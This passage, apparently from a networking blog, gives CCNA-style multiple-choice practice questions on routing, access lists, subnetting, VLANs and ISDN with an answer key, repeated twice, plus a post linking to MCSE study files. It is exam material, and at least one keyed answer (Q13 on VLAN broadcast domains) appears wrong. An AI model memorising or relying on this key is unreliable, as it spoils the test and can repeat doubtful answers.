D) access-list 101 permit icmp host 175.2.10.0 any eq www
10) Which of the following is true about IP RIP based networks?
A) The default update time is 30 seconds.
B) The default update time is 90 seconds.
C) Only changes to the routing tables are sent during updates.
D) Complete routing table are sent during updates.
11) How do you apply the access group command?
A) Router(config) # access-list 1 out
B) Router(config-if) # access-listp 1 out
C) Router(config) # access-group 1 out
D) Router(config-if) # access-group 1 out
12) What are the access-list ranges of IP (standard and extended)?
A) 1-99 and 100-199
B) 1-99 and 900-999
C) 100-199 and 800-899
D) 800-899 and 900-999
13) Which are true regarding VLANs?
A) VLANs have the same collision domain
B) VLANs have the same broadcast domain
C) VLANs are less secure compared to switch or hub networks.
D) VLANs use layer 2 switching which is a substitute for routing technology which uses
routers.
14) Which of the following statements are true about EIGRP route summarization?
A) EIGRP provides summarization of routes at classful boundaries by default.
B) For summarizing routes at an arbitrary boundary, one need to disable auto
summarization, using “no auto-summary” command.
C) Manual summarization in EIGRP network takes place on any interface in the network.
D) For specifying a summary route manually, you must specify the metrics.
15) How many access-lists are possible on an interface per protocol ?
A) There can be only one access list in and one for out per router.
B) There can be only one access list for in and one for out on each interface per protocol.
C) There can be only one access list per router.
D) There can be only one access list for each interface per protocol.
16) What does the ISDN protocol Q define ?
A) Concepts, terminology and services
B) Existing telephone network
C) Switching and signaling
D) Quality of Services
17) You have a network ID of 121.69.0.0. You need to divide it into multiple subnets
with at least 500 hosts per each subnet. Which subnet mask should you use so that you
will be able to divide the network into maximum number of subnets?
A) 255.255.128.0
B) 255.255.224.0
C) 255.255.248.0
D) 255.255.254.0
18) What switching type has the lowest latency?
A) Store and forward
B) Cut-through
C) Split horizon
D) Fragment-free
19) What comprises an ISDN BRI line?
A) Two 64 KBPS B channels and one 4 KBPS D channel
B) 24 B channels and one 64 KBPS D channel
C) Two 64 KBPS B channels and one 16 KBPS D channel
D) One 64 KBPS B channels and one 16 KBPS D channel
20) Where is the fully functional IOS stored?
A) Flash
B) ROM
C) RAM
D) NVRAM
Answer Key
1)A, 2)B, 3)C, 4)C, 5)B, 6)C, 7)D, 8)A,B,C,D 9)C, 10)A,D 11)D, 12)A, 13)B, 14)A,B,C
15)B, 16)C 17)D, 18)B, 19)C, 20)A
1) Which of the following protocols use "Hello" packets?
A) OSPF
B) RIP2
C) IGRP
D) RIP
2) How to enable a Banner on a Cisco Router ?
A) Router(Config-if)# banner motd #
B) Router(Config)# banner motd #
C) Router(Config)# motd banner motd #
D) Router(Config-if)# motd banner #
3) How many hosts and subnets are possible if you have an IP of 151.242.16.49 with a
subnet mask of 7 bits?
A) 510 hosts and 126 subnets
B) 512 hosts and 128 subnets
C) 126 subnets and 510 hosts
D) 128 subnets and 512 hosts
4) What's the default subnet mask for a Class C IP adresses?
A) 255.0.0.0
B) 255.255.0.0
C) 255.255.255.0
D) 255.255.255.255
5) Which encapsulation must be used to enable Ethernet_II frame type on your Ethernet
interface?
A) SAP
B) ARPA
C) RIP
D) SNAP
6) Which IP-class provides the least number of Hosts?
A) Class A
B) Class B
C) Class C
D) Class D
7) How to define access-list commands ?
A) Router(config-if)# access-list 1 permit 172.16.20.1 255.255.0.0
B) Router(config) # access-list 1 permit 172.16.20.1 255.255.0.0
C) Router(config-if)# access-list 1 permit 172.16.20.1 0.0.0.0
D) Router(config) # access-list 1 permit 172.16.20.1 0.0.0.0
8) Which of the following solutions prevent routing loops?
A) Split Horizon
B) Poison Reverse
C) Hold-down Timers
D) Triggered Updates
9) Which of the following is a valid extended IP access list?
A) access-list 101 permit ip host 175.2.10.0 any eq 80
B) access-list 101 permit ip host 175.2.10.0 any eq www
C) access-list 101 permit tcp host 175.2.10.0 any eq 80
D) access-list 101 permit icmp host 175.2.10.0 any eq www
10) Which of the following is true about IP RIP based networks?
A) The default update time is 30 seconds.
B) The default update time is 90 seconds.
C) Only changes to the routing tables are sent during updates.
D) Complete routing table are sent during updates.
11) How do you apply the access group command?
A) Router(config) # access-list 1 out
B) Router(config-if) # access-listp 1 out
C) Router(config) # access-group 1 out
D) Router(config-if) # access-group 1 out
12) What are the access-list ranges of IP (standard and extended)?
A) 1-99 and 100-199
B) 1-99 and 900-999
C) 100-199 and 800-899
D) 800-899 and 900-999
13) Which are true regarding VLANs?
A) VLANs have the same collision domain
B) VLANs have the same broadcast domain
C) VLANs are less secure compared to switch or hub networks.
D) VLANs use layer 2 switching which is a substitute for routing technology which uses
routers.
14) Which of the following statements are true about EIGRP route summarization?
A) EIGRP provides summarization of routes at classful boundaries by default.
B) For summarizing routes at an arbitrary boundary, one need to disable auto
summarization, using “no auto-summary” command.
C) Manual summarization in EIGRP network takes place on any interface in the network.
D) For specifying a summary route manually, you must specify the metrics.
15) How many access-lists are possible on an interface per protocol ?
A) There can be only one access list in and one for out per router.
B) There can be only one access list for in and one for out on each interface per protocol.
C) There can be only one access list per router.
D) There can be only one access list for each interface per protocol.
16) What does the ISDN protocol Q define ?
A) Concepts, terminology and services
B) Existing telephone network
C) Switching and signaling
D) Quality of Services
17) You have a network ID of 121.69.0.0. You need to divide it into multiple subnets
with at least 500 hosts per each subnet. Which subnet mask should you use so that you
will be able to divide the network into maximum number of subnets?
A) 255.255.128.0
B) 255.255.224.0
C) 255.255.248.0
D) 255.255.254.0
18) What switching type has the lowest latency?
A) Store and forward
B) Cut-through
C) Split horizon
D) Fragment-free
19) What comprises an ISDN BRI line?
A) Two 64 KBPS B channels and one 4 KBPS D channel
B) 24 B channels and one 64 KBPS D channel
C) Two 64 KBPS B channels and one 16 KBPS D channel
D) One 64 KBPS B channels and one 16 KBPS D channel
20) Where is the fully functional IOS stored?
A) Flash
B) ROM
C) RAM
D) NVRAM
Answer Key
1)A, 2)B, 3)C, 4)C, 5)B, 6)C, 7)D, 8)A,B,C,D 9)C, 10)A,D 11)D, 12)A, 13)B, 14)A,B,C
15)B, 16)C 17)D, 18)B, 19)C, 20)A
Labels:
CCNA,
Networking certifications,
Networking Core
Thursday, February 11, 2010
Some tuts and books on networking for everyone....
Practicle knowledge for MCSE guys i.e. with pics:
http://www.4shared.com/file/219815219/268fcbbf/MCSE_PRACTICALS.html
Networking basics and tuts for guys :-
http://www.4shared.com/file/219820449/2f0bc9aa/MCSE_Networking_Essentials_1.html
http://www.4shared.com/file/219825839/5e8e563b/MCSE_-_Networking_-_TCPIP_Trai.html
http://www.4shared.com/file/219832638/83a05aae/MCSE_Networking_Essentials.html
http://www.4shared.com/file/219815219/268fcbbf/MCSE_PRACTICALS.html
Networking basics and tuts for guys :-
http://www.4shared.com/file/219820449/2f0bc9aa/MCSE_Networking_Essentials_1.html
http://www.4shared.com/file/219825839/5e8e563b/MCSE_-_Networking_-_TCPIP_Trai.html
http://www.4shared.com/file/219832638/83a05aae/MCSE_Networking_Essentials.html
Labels:
MCSE,
Networking certifications,
Networking Core
Subscribe to:
Posts (Atom)